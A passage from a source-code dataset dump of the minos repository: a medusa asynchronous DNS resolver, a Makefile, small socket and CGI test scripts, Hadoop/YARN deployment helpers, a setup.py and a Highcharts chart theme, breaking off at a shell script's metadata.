Note also that the TCP client will have to prepend each request\n# with a 2-byte length indicator (see rfc1035).\n#\n\nclass resolver (asyncore.dispatcher):\n id = counter()\n def __init__ (self, server='127.0.0.1'):\n asyncore.dispatcher.__init__ (self)\n self.create_socket (socket.AF_INET, socket.SOCK_DGRAM)\n self.server = server\n self.request_map = {}\n self.last_reap_time = int(time.time()) # reap every few minutes\n\n def writable (self):\n return 0\n\n def log (self, *args):\n pass\n\n def handle_close (self):\n self.log_info('closing!')\n self.close()\n\n def handle_error (self): # don't close the connection on error\n (file,fun,line), t, v, tbinfo = asyncore.compact_traceback()\n self.log_info(\n 'Problem with DNS lookup (%s:%s %s)' % (t, v, tbinfo),\n 'error')\n\n def get_id (self):\n return (self.id.as_long() % (1<<16))\n\n def reap (self): # find DNS requests that have timed out\n now = int(time.time())\n if now - self.last_reap_time > 180: # reap every 3 minutes\n self.last_reap_time = now # update before we forget\n for k,(host,unpack,callback,when) in self.request_map.items():\n if now - when > 180: # over 3 minutes old\n del self.request_map[k]\n try: # same code as in handle_read\n callback (host, 0, None) # timeout val is (0,None)\n except:\n (file,fun,line), t, v, tbinfo = asyncore.compact_traceback()\n self.log_info('%s %s %s' % (t,v,tbinfo), 'error')\n\n def resolve (self, host, callback):\n self.reap() # first, get rid of old guys\n self.socket.sendto (\n fast_address_request (host, self.get_id()),\n (self.server, 53)\n )\n self.request_map [self.get_id()] = (\n host, unpack_address_reply, callback, int(time.time()))\n self.id.increment()\n\n def resolve_ptr (self, host, callback):\n self.reap() # first, get rid of old guys\n ip = string.split (host, '.')\n ip.reverse()\n ip = string.join (ip, '.') + '.in-addr.arpa'\n self.socket.sendto (\n fast_ptr_request (ip, self.get_id()),\n (self.server, 53)\n )\n self.request_map [self.get_id()] = (\n host, unpack_ptr_reply, callback, int(time.time()))\n self.id.increment()\n\n def handle_read (self):\n reply, whence = self.socket.recvfrom (512)\n # for security reasons we may want to double-check\n # that <whence> is the server we sent the request to.\n id = (ord(reply[0])<<8) + ord(reply[1])\n if self.request_map.has_key (id):\n host, unpack, callback, when = self.request_map[id]\n del self.request_map[id]\n ttl, answer = unpack (reply)\n try:\n callback (host, ttl, answer)\n except:\n (file,fun,line), t, v, tbinfo = asyncore.compact_traceback()\n self.log_info('%s %s %s' % ( t,v,tbinfo), 'error')\n\nclass rbl (resolver):\n\n def resolve_maps (self, host, callback):\n ip = string.split (host, '.')\n ip.reverse()\n ip = string.join (ip, '.') + '.rbl.maps.vix.com'\n self.socket.sendto (\n fast_ptr_request (ip, self.get_id()),\n (self.server, 53)\n )\n self.request_map [self.get_id()] = host, self.check_reply, callback\n self.id.increment()\n\n def check_reply (self, r):\n # we only need to check RCODE.\n rcode = (ord(r[3])&0xf)\n self.log_info('MAPS RBL; RCODE =%02x\\n %s' % (rcode, repr(r)))\n return 0, rcode # (ttl, answer)\n\n\nclass hooked_callback:\n def __init__ (self, hook, callback):\n self.hook, self.callback = hook, callback\n\n def __call__ (self, *args):\n apply (self.hook, args)\n apply (self.callback, args)\n\nclass caching_resolver (resolver):\n \"Cache DNS queries. Will need to honor the TTL value in the replies\"\n\n def __init__ (*args):\n apply (resolver.__init__, args)\n self = args[0]\n self.cache = {}\n self.forward_requests = counter()\n self.reverse_requests = counter()\n self.cache_hits = counter()\n\n def resolve (self, host, callback):\n self.forward_requests.increment()\n if self.cache.has_key (host):\n when, ttl, answer = self.cache[host]\n # ignore TTL for now\n callback (host, ttl, answer)\n self.cache_hits.increment()\n else:\n resolver.resolve (\n self,\n host,\n hooked_callback (\n self.callback_hook,\n callback\n )\n )\n\n def resolve_ptr (self, host, callback):\n self.reverse_requests.increment()\n if self.cache.has_key (host):\n when, ttl, answer = self.cache[host]\n # ignore TTL for now\n callback (host, ttl, answer)\n self.cache_hits.increment()\n else:\n resolver.resolve_ptr (\n self,\n host,\n hooked_callback (\n self.callback_hook,\n callback\n )\n )\n\n def callback_hook (self, host, ttl, answer):\n self.cache[host] = time.time(), ttl, answer\n\n SERVER_IDENT = 'Caching DNS Resolver (V%s)' % VERSION\n\n def status (self):\n import producers\n return producers.simple_producer (\n '<h2>%s</h2>' % self.SERVER_IDENT\n + '<br>Server: %s' % self.server\n + '<br>Cache Entries: %d' % len(self.cache)\n + '<br>Outstanding Requests: %d' % len(self.request_map)\n + '<br>Forward Requests: %s' % self.forward_requests\n + '<br>Reverse Requests: %s' % self.reverse_requests\n + '<br>Cache Hits: %s' % self.cache_hits\n )\n\n#test_reply = \"\"\"\\000\\000\\205\\200\\000\\001\\000\\001\\000\\002\\000\\002\\006squirl\\011nightmare\\003com\\000\\000\\001\\000\\001\\300\\014\\000\\001\\000\\001\\000\\001Q\\200\\000\\004\\315\\240\\260\\005\\011nightmare\\003com\\000\\000\\002\\000\\001\\000\\001Q\\200\\000\\002\\300\\014\\3006\\000\\002\\000\\001\\000\\001Q\\200\\000\\015\\003ns1\\003iag\\003net\\000\\300\\014\\000\\001\\000\\001\\000\\001Q\\200\\000\\004\\315\\240\\260\\005\\300]\\000\\001\\000\\001\\000\\000\\350\\227\\000\\004\\314\\033\\322\\005\"\"\"\n# def test_unpacker ():\n# print unpack_address_reply (test_reply)\n#\n# import time\n# class timer:\n# def __init__ (self):\n# self.start = time.time()\n# def end (self):\n# return time.time() - self.start\n#\n# # I get ~290 unpacks per second for the typical case, compared to ~48\n# # using dnslib directly. also, that latter number does not include\n# # picking the actual data out.\n#\n# def benchmark_unpacker():\n#\n# r = range(1000)\n# t = timer()\n# for i in r:\n# unpack_address_reply (test_reply)\n# print '%.2f unpacks per second' % (1000.0 / t.end())\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n print 'usage: %s [-r] [-s <server_IP>] host [host ...]' % sys.argv[0]\n sys.exit(0)\n elif ('-s' in sys.argv):\n i = sys.argv.index('-s')\n server = sys.argv[i+1]\n del sys.argv[i:i+2]\n else:\n server = '127.0.0.1'\n\n if ('-r' in sys.argv):\n reverse = 1\n i = sys.argv.index('-r')\n del sys.argv[i]\n else:\n reverse = 0\n\n if ('-m' in sys.argv):\n maps = 1\n sys.argv.remove ('-m')\n else:\n maps = 0\n\n if maps:\n r = rbl (server)\n else:\n r = caching_resolver(server)\n\n count = len(sys.argv) - 1\n\n def print_it (host, ttl, answer):\n global count\n print '%s: %s' % (host, answer)\n count = count - 1\n if not count:\n r.close()\n\n for host in sys.argv[1:]:\n if reverse:\n r.resolve_ptr (host, print_it)\n elif maps:\n r.resolve_maps (host, print_it)\n else:\n r.resolve (host, print_it)\n\n # hooked asyncore.loop()\n while asyncore.socket_map:\n asyncore.poll (30.0)\n print 'requests outstanding: %d' % len(r.request_map)\n"
},
{
"alpha_fraction": 0.5496688485145569,
"alphanum_fraction": 0.5496688485145569,
"avg_line_length": 17.75,
"blob_id": "29135ff55fd5e28cf8e1e20ddbee089f7906eafe",
"content_id": "55174899b049fd86f0ad5fc5a31f59a45563c678",
"detected_licenses": [
"Apache-2.0",
"HPND",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 151,
"license_type": "permissive",
"max_line_length": 37,
"num_lines": 8,
"path": "/supervisor/supervisor/medusa/Makefile",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Makefile -*-\n\nclean:\n\tfind ./ -name '*.pyc' -exec rm {} \\;\n\tfind ./ -name '*~' -exec rm {} \\;\n\ndist_debian:\n\tdpkg-buildpackage -rfakeroot\n\n"
},
{
"alpha_fraction": 0.5160142183303833,
"alphanum_fraction": 0.5231316685676575,
"avg_line_length": 22.41666603088379,
"blob_id": "a113058840ef707bfd0c701465e3404ae62ff8eb",
"content_id": "56ae02faf2ebb056c782fc01c6130405af65e346",
"detected_licenses": [
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor",
"HPND",
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 281,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 12,
"path": "/supervisor/supervisor/medusa/thread/test_module.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\nimport pprint\n\ndef main (env, stdin, stdout):\n\n stdout.write (\n '<html><body><h1>Test CGI Module</h1>\\r\\n'\n '<br>The Environment:<pre>\\r\\n'\n )\n pprint.pprint (env, stdout)\n stdout.write ('</pre></body></html>\\r\\n')\n"
},
{
"alpha_fraction": 0.4767358601093292,
"alphanum_fraction": 0.49248388409614563,
"avg_line_length": 20.828125,
"blob_id": "2e1c493828449a4e82739ed39537d231af40aacf",
"content_id": "79ab9447fd3e778562b1079f6eb4aa19027cc4e1",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1397,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 64,
"path": "/supervisor/supervisor/medusa/test/max_sockets.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\nimport socket\nimport select\n\n# several factors here we might want to test:\n# 1) max we can create\n# 2) max we can bind\n# 3) max we can listen on\n# 4) max we can connect\n\ndef max_server_sockets():\n sl = []\n while 1:\n try:\n s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)\n s.bind (('',0))\n s.listen(5)\n sl.append (s)\n except:\n break\n num = len(sl)\n for s in sl:\n s.close()\n del sl\n return num\n\ndef max_client_sockets():\n # make a server socket\n server = socket.socket (socket.AF_INET, socket.SOCK_STREAM)\n server.bind (('', 9999))\n server.listen (5)\n sl = []\n while 1:\n try:\n s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)\n s.connect (('', 9999))\n conn, addr = server.accept()\n sl.append ((s,conn))\n except:\n break\n num = len(sl)\n for s,c in sl:\n s.close()\n c.close()\n del sl\n return num\n\ndef max_select_sockets():\n sl = []\n while 1:\n try:\n s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)\n s.bind (('',0))\n s.listen(5)\n sl.append (s)\n select.select(sl,[],[],0)\n except:\n break\n num = len(sl) - 1\n for s in sl:\n s.close()\n del sl\n return num\n"
},
{
"alpha_fraction": 0.5875421166419983,
"alphanum_fraction": 0.5909090638160706,
"avg_line_length": 33.911766052246094,
"blob_id": "7ffdd95db3fbffd99c085b9764c4a6f9b80fe3f3",
"content_id": "ed6d2948d3505263f1154c69a3e50cfaba076af5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1188,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 34,
"path": "/owl/utils/hadoop_util.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport logging\nimport subprocess\nimport os\n\nCLIENT_DEPLOY_ENTRY = os.getenv(\"CLIENT_DEPLOY_ENTRY\")\nENV_PYTHON = os.getenv(\"ENV_PYTHON\")\n\nlogger = logging.getLogger('quota')\ndef get_quota_summary(cluster_name):\n res = []\n try:\n cmd_user = [ENV_PYTHON, CLIENT_DEPLOY_ENTRY, 'shell', 'hdfs', cluster_name, 'dfs', '-quota', '/user/*']\n cmd_hbase = [ENV_PYTHON, CLIENT_DEPLOY_ENTRY, 'shell', 'hdfs', cluster_name, 'dfs', '-quota', '/hbase']\n for cmd in [cmd_user, cmd_hbase]:\n content = subprocess.check_output(cmd)\n\n for line in content.strip().split('\\n'):\n dir_info = {}\n (dir_info['quota'], dir_info['used_quota'],\n dir_info['remaining_quota'], dir_info['space_quota'],\n dir_info['used_space_quota'], dir_info['remaining_space_quota'],\n dir_info['name']) = line.split()\n # discard prefix '/user/', only keep with user name\n if len(dir_info['name']) > 7:\n dir_info['name'] = dir_info['name'][6:]\n else:\n dir_info['name'] = 'hbase'\n res.append(dir_info)\n except Exception, e:\n if repr(e).find(\"No such file\") == -1:\n return \"\"\n raise e\n return res\n\n"
},
{
"alpha_fraction": 0.699613630771637,
"alphanum_fraction": 0.7008500695228577,
"avg_line_length": 39.69182205200195,
"blob_id": "4838adaa27c6fb03a4bc17de88f0f3d5323df071",
"content_id": "2ffec05e8d605b8ed6afe02b8fb7ad756789991e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12940,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 318,
"path": "/client/deploy_yarn.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import argparse\nimport deploy_hdfs\nimport deploy_utils\nimport parallel_deploy\nimport subprocess\nimport sys\nimport urlparse\n\nfrom log import Log\n\nALL_JOBS = [\"resourcemanager\", \"nodemanager\", \"historyserver\", \"proxyserver\"]\n\nSHELL_COMMAND_INFO = {\n \"rmadmin\": (\"org.apache.hadoop.yarn.server.resourcemanager.tools.RMAdmin\",\n \"admin tools\"),\n \"version\": (\"org.apache.hadoop.util.VersionInfo\", \"print the version\"),\n \"jar\": (\"org.apache.hadoop.util.RunJar\", \"run a jar file\"),\n \"logs\": (\"org.apache.hadoop.yarn.logaggregation.LogDumper\",\n \"dump container logs\"),\n \"daemonlog\": (\"org.apache.hadoop.log.LogLevel\",\n \"get/set the log level for each daemon\"),\n}\n\ndef get_yarn_service_config(args):\n args.yarn_config = deploy_utils.get_service_config(args)\n if not args.yarn_config.cluster.zk_cluster:\n Log.print_critical(\n \"yarn cluster must depends on a zookeeper clusters: %s\" %\n args.yarn_config.cluster.name)\n\ndef generate_metrics_config(args, host, job_name, instance_id=-1):\n job = args.yarn_config.jobs[job_name]\n supervisor_client = deploy_utils.get_supervisor_client(host, \"yarn\",\n args.yarn_config.cluster.name, job_name, instance_id=instance_id)\n\n ganglia_switch = \"# \"\n if args.yarn_config.cluster.ganglia_address:\n ganglia_switch = \"\"\n config_dict = {\n \"job_name\": job_name,\n \"period\": 10,\n \"data_dir\": supervisor_client.get_log_dir(),\n \"ganglia_address\": args.yarn_config.cluster.ganglia_address,\n \"ganglia_switch\": ganglia_switch,\n }\n\n local_path = \"%s/hadoop-metrics2.properties.tmpl\" % deploy_utils.get_template_dir()\n template = deploy_utils.Template(open(local_path, \"r\").read())\n return template.substitute(config_dict)\n\ndef generate_configs(args, host, job_name, instance_id):\n core_site_xml = deploy_utils.generate_site_xml(args,\n args.yarn_config.configuration.generated_files[\"core-site.xml\"])\n hdfs_site_xml = deploy_utils.generate_site_xml(args,\n args.yarn_config.configuration.generated_files[\"hdfs-site.xml\"])\n mapred_site_xml = deploy_utils.generate_site_xml(args,\n args.yarn_config.configuration.generated_files[\"mapred-site.xml\"])\n yarn_site_xml = deploy_utils.generate_site_xml(args,\n args.yarn_config.configuration.generated_files[\"yarn-site.xml\"])\n hadoop_metrics2_properties = generate_metrics_config(args, host, job_name, instance_id)\n\n config_files = {\n \"core-site.xml\": core_site_xml,\n \"hdfs-site.xml\": hdfs_site_xml,\n \"mapred-site.xml\": mapred_site_xml,\n \"yarn-site.xml\": yarn_site_xml,\n \"hadoop-metrics2.properties\": hadoop_metrics2_properties,\n }\n config_files.update(args.yarn_config.configuration.raw_files)\n\n return config_files\n\ndef generate_run_scripts_params(args, host, job_name, host_id, instance_id):\n job = args.yarn_config.jobs[job_name]\n\n supervisor_client = deploy_utils.get_supervisor_client(host,\n \"yarn\", args.yarn_config.cluster.name, job_name, instance_id=instance_id)\n\n artifact_and_version = \"hadoop-\" + args.yarn_config.cluster.version\n\n jar_dirs = \"\"\n for component in [\"common\", \"mapreduce\", \"yarn\", \"hdfs\"]:\n if jar_dirs: jar_dirs += \":\"\n component_dir = (\"$package_dir/share/hadoop/%s\" % component)\n jar_dirs += \"%s/:%s/lib/*:%s/*\" % (\n component_dir, component_dir, component_dir)\n\n service_env = \"\"\n for component_path in [\"HADOOP_COMMON_HOME\", \"HADOOP_HDFS_HOME\", \"YARN_HOME\"]:\n service_env += \"export %s=$package_dir\\n\" % (component_path)\n log_level = deploy_utils.get_service_log_level(args, args.yarn_config)\n\n params = job.get_arguments(args, args.yarn_config.cluster, args.yarn_config.jobs,\n args.yarn_config.arguments_dict, job_name, host_id, instance_id)\n\n script_dict = {\n \"artifact\": artifact_and_version,\n \"job_name\": job_name,\n \"jar_dirs\": jar_dirs,\n \"run_dir\": supervisor_client.get_run_dir(),\n \"service_env\": service_env,\n \"params\": params,\n }\n\n return script_dict\n\ndef generate_start_script(args, host, job_name, host_id, instance_id):\n script_params = generate_run_scripts_params(args, host, job_name, host_id, instance_id)\n return deploy_utils.create_run_script(\n \"%s/start.sh.tmpl\" % deploy_utils.get_template_dir(),\n script_params)\n\ndef install(args):\n get_yarn_service_config(args)\n deploy_utils.install_service(args, \"yarn\", args.yarn_config, \"hadoop\")\n\ndef cleanup_job(args, host, job_name, host_id, instance_id, cleanup_token, active):\n deploy_utils.cleanup_job(\"yarn\", args.yarn_config,\n host, job_name, instance_id, cleanup_token)\n\ndef cleanup(args):\n get_yarn_service_config(args)\n\n cleanup_token = deploy_utils.confirm_cleanup(args,\n \"yarn\", args.yarn_config)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.yarn_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'cleanup', cleanup_token=cleanup_token)\n parallel_deploy.start_deploy_threads(cleanup_job, task_list)\n\ndef bootstrap_job(args, host, job_name, host_id, instance_id, cleanup_token, active):\n # parse the service_config according to the instance_id\n args.yarn_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n deploy_utils.bootstrap_job(args, \"hadoop\", \"yarn\",\n args.yarn_config, host, job_name, instance_id, cleanup_token, '0')\n start_job(args, host, job_name, host_id, instance_id)\n\ndef bootstrap(args):\n get_yarn_service_config(args)\n cleanup_token = deploy_utils.confirm_bootstrap(\"yarn\", args.yarn_config)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.yarn_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'bootstrap', cleanup_token=cleanup_token)\n parallel_deploy.start_deploy_threads(bootstrap_job, task_list)\n\ndef start_job(args, host, job_name, host_id, instance_id, is_wait=False):\n if is_wait:\n deploy_utils.wait_for_job_stopping(\"yarn\",\n args.yarn_config.cluster.name, job_name, host, instance_id)\n\n # parse the service_config according to the instance_id\n args.yarn_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n config_files = generate_configs(args, host, job_name, instance_id)\n start_script = generate_start_script(args, host, job_name, host_id, instance_id)\n http_url = deploy_utils.get_http_service_uri(host,\n args.yarn_config.jobs[job_name].base_port, instance_id)\n deploy_utils.start_job(args, \"hadoop\", \"yarn\", args.yarn_config,\n host, job_name, instance_id, start_script, http_url, **config_files)\n\ndef start(args):\n if not args.skip_confirm:\n deploy_utils.confirm_start(args)\n get_yarn_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.yarn_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'start')\n parallel_deploy.start_deploy_threads(start_job, task_list)\n\ndef stop_job(args, host, job_name, instance_id):\n deploy_utils.stop_job(\"yarn\", args.yarn_config,\n host, job_name, instance_id)\n\ndef stop(args):\n if not args.skip_confirm:\n deploy_utils.confirm_stop(args)\n get_yarn_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.yarn_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'stop')\n parallel_deploy.start_deploy_threads(stop_job, task_list)\n\ndef restart(args):\n if not args.skip_confirm:\n deploy_utils.confirm_restart(args)\n get_yarn_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.yarn_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'stop')\n parallel_deploy.start_deploy_threads(stop_job, task_list)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.yarn_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'start', is_wait=True)\n parallel_deploy.start_deploy_threads(start_job, task_list)\n\ndef show_job(args, host, job_name, instance_id):\n deploy_utils.show_job(\"yarn\", args.yarn_config, host, job_name, instance_id)\n\ndef show(args):\n get_yarn_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.yarn_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'show')\n parallel_deploy.start_deploy_threads(show_job, task_list)\n\ndef run_shell(args):\n get_yarn_service_config(args)\n\n main_class, options = deploy_utils.parse_shell_command(\n args, SHELL_COMMAND_INFO)\n if not main_class:\n return\n\n # parse the service_config, suppose the instance_id is -1\n args.yarn_config.parse_generated_config_files(args)\n core_site_dict = args.yarn_config.configuration.generated_files[\"core-site.xml\"]\n hdfs_site_dict = args.yarn_config.configuration.generated_files[\"hdfs-site.xml\"]\n mapred_site_dict = args.yarn_config.configuration.generated_files[\"mapred-site.xml\"]\n yarn_site_dict = args.yarn_config.configuration.generated_files[\"yarn-site.xml\"]\n\n hadoop_opts = list()\n for key, value in core_site_dict.iteritems():\n hadoop_opts.append(\"-D%s%s=%s\" % (deploy_utils.HADOOP_PROPERTY_PREFIX,\n key, value))\n for key, value in hdfs_site_dict.iteritems():\n hadoop_opts.append(\"-D%s%s=%s\" % (deploy_utils.HADOOP_PROPERTY_PREFIX,\n key, value))\n for key, value in mapred_site_dict.iteritems():\n hadoop_opts.append(\"-D%s%s=%s\" % (deploy_utils.HADOOP_PROPERTY_PREFIX,\n key, value))\n for key, value in yarn_site_dict.iteritems():\n hadoop_opts.append(\"-D%s%s=%s\" % (deploy_utils.HADOOP_PROPERTY_PREFIX,\n key, value))\n\n if deploy_utils.is_security_enabled(args):\n hadoop_opts.append(\n \"-Djava.security.krb5.conf=%s/krb5-hadoop.conf\" %\n deploy_utils.get_config_dir())\n\n package_root = deploy_utils.get_artifact_package_root(args,\n args.yarn_config.cluster, \"hadoop\")\n lib_root = \"%s/share/hadoop\" % package_root\n class_path = \"%s/etc/hadoop\" % package_root\n for component in [\"common\", \"hdfs\", \"mapreduce\", \"yarn\"]:\n component_dir = \"%s/%s\" % (lib_root, component)\n class_path += \":%s/:%s/*:%s/lib/*\" % (component_dir,\n component_dir, component_dir)\n\n cmd = ([\"java\", \"-cp\", class_path] + hadoop_opts +\n [main_class] + options)\n p = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr)\n p.wait()\n\ndef generate_client_config(args, artifact, version):\n config_path = \"%s/%s/%s-%s/etc/hadoop\" % (args.package_root,\n args.cluster, artifact, version)\n deploy_utils.write_file(\"%s/mapred-site.xml\" % config_path,\n deploy_utils.generate_site_xml(args,\n args.yarn_config.configuration.generated_files[\"mapred-site.xml\"]))\n deploy_utils.write_file(\"%s/yarn-site.xml\" % config_path,\n deploy_utils.generate_site_xml(args,\n args.yarn_config.configuration.generated_files[\"yarn-site.xml\"]))\n deploy_utils.write_file(\"%s/krb5.conf\" % config_path,\n args.yarn_config.configuration.raw_files[\"krb5.conf\"])\n deploy_hdfs.update_hadoop_env_sh(args, artifact, version, \"YARN_OPTS\")\n\ndef pack(args):\n get_yarn_service_config(args)\n args.yarn_config.parse_generated_config_files(args)\n version = args.yarn_config.cluster.version\n deploy_utils.make_package_dir(args, \"hadoop\", args.yarn_config.cluster)\n args.hdfs_config.parse_generated_config_files(args)\n deploy_hdfs.generate_client_config(args, \"hadoop\", version)\n generate_client_config(args, \"hadoop\", version)\n\n if not args.skip_tarball:\n deploy_utils.pack_package(args, \"hadoop\", args.yarn_config.cluster.version)\n Log.print_success(\"Pack client utilities for hadoop success!\\n\")\n\ndef rolling_update(args):\n if not args.job:\n Log.print_critical(\"You must specify the job name to do rolling update\")\n\n get_yarn_service_config(args)\n job_name = args.job[0]\n\n if not args.skip_confirm:\n deploy_utils.confirm_action(args, \"rolling_update\")\n\n Log.print_info(\"Rolling updating %s\" % job_name)\n hosts = args.yarn_config.jobs[job_name].hosts\n wait_time = 0\n\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.iterkeys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.confirm_rolling_update(host_id, instance_id, wait_time)\n stop_job(args, hosts[host_id].ip, job_name, instance_id)\n deploy_utils.wait_for_job_stopping(\"yarn\",\n args.yarn_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n start_job(args, hosts[host_id].ip, job_name, host_id, instance_id)\n deploy_utils.wait_for_job_starting(\"yarn\",\n args.yarn_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n wait_time = args.time_interval\n Log.print_success(\"Rolling updating %s success\" % job_name)\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.5557940006256104,
"alphanum_fraction": 0.5965664982795715,
"avg_line_length": 26.352941513061523,
"blob_id": "6c4ab5fe46aeea285719893d37012e03379725ae",
"content_id": "725dfe50ebdda230df9a450c63ce62fd84c727a6",
"detected_licenses": [
"Apache-2.0",
"HPND",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 466,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 17,
"path": "/supervisor/supervisor/medusa/setup.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "\n__revision__ = '$Id: setup.py,v 1.9 2003/08/22 13:07:07 akuchling Exp $'\n\nfrom distutils.core import setup\n\nsetup(\n name = 'medusa',\n version = \"0.5.4\",\n description = \"A framework for implementing asynchronous servers.\",\n author = \"Sam Rushing\",\n author_email = \"[email protected]\",\n maintainer = \"A.M. Kuchling\",\n maintainer_email = \"[email protected]\",\n url = \"http://oedipus.sourceforge.net/medusa/\",\n\n packages = ['medusa'],\n package_dir = {'medusa':'.'},\n )\n"
},
{
"alpha_fraction": 0.3707011938095093,
"alphanum_fraction": 0.4269763231277466,
"avg_line_length": 22.56842041015625,
"blob_id": "9be4443340e808f10f90c6be1bf10d86c1730a40",
"content_id": "d2d9b64be20dbd00e618848c8179c096c4cd317b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2239,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 95,
"path": "/owl/static/highcharts/themes/grid.js",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "/**\n * Grid theme for Highcharts JS\n * @author Torstein Hønsi\n */\n\nHighcharts.theme = {\n colors:['#058DC7', '#50B432', '#ED561B', '#DDDF00', '#24CBE5', '#64E572', '#FF9655', '#FFF263', '#6AF9C4'],\n chart:{\n backgroundColor:{\n linearGradient:{ x1:0, y1:0, x2:1, y2:1 },\n stops:[\n [0, 'rgb(255, 255, 255)'],\n [1, 'rgb(240, 240, 255)']\n ]\n },\n borderWidth:2,\n plotBackgroundColor:'rgba(255, 255, 255, .9)',\n plotShadow:true,\n plotBorderWidth:1\n },\n title:{\n style:{\n color:'#000',\n font:'bold 16px \"Trebuchet MS\", Verdana, sans-serif'\n }\n },\n subtitle:{\n style:{\n color:'#666666',\n font:'bold 12px \"Trebuchet MS\", Verdana, sans-serif'\n }\n },\n xAxis:{\n gridLineWidth:1,\n lineColor:'#000',\n tickColor:'#000',\n labels:{\n style:{\n color:'#000',\n font:'11px Trebuchet MS, Verdana, sans-serif'\n }\n },\n title:{\n style:{\n color:'#333',\n fontWeight:'bold',\n fontSize:'12px',\n fontFamily:'Trebuchet MS, Verdana, sans-serif'\n\n }\n }\n },\n yAxis:{\n minorTickInterval:'auto',\n lineColor:'#000',\n lineWidth:1,\n tickWidth:1,\n tickColor:'#000',\n labels:{\n style:{\n color:'#000',\n font:'11px Trebuchet MS, Verdana, sans-serif'\n }\n },\n title:{\n style:{\n color:'#333',\n fontWeight:'bold',\n fontSize:'12px',\n fontFamily:'Trebuchet MS, Verdana, sans-serif'\n }\n }\n },\n legend:{\n itemStyle:{\n font:'9pt Trebuchet MS, Verdana, sans-serif',\n color:'black'\n\n },\n itemHoverStyle:{\n color:'#039'\n },\n itemHiddenStyle:{\n color:'gray'\n }\n },\n labels:{\n style:{\n color:'#99b'\n }\n }\n};\n\n// Apply the theme\nvar highchartsOptions = Highcharts.setOptions(Highcharts.theme);\n"
},
{
"alpha_fraction": 0.6342525482177734,
"alphanum_fraction": 0.6473149657249451,
"avg_line_length": 20.53125,
"blob_id": "4c223e3c6852ff9397c14291f0703041b4917b59",
"content_id": "f665a77e5a72481c3dadaa71bd553654a0dcd2e1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 689,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 32,
"path": "/client/init_hadoop_user.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
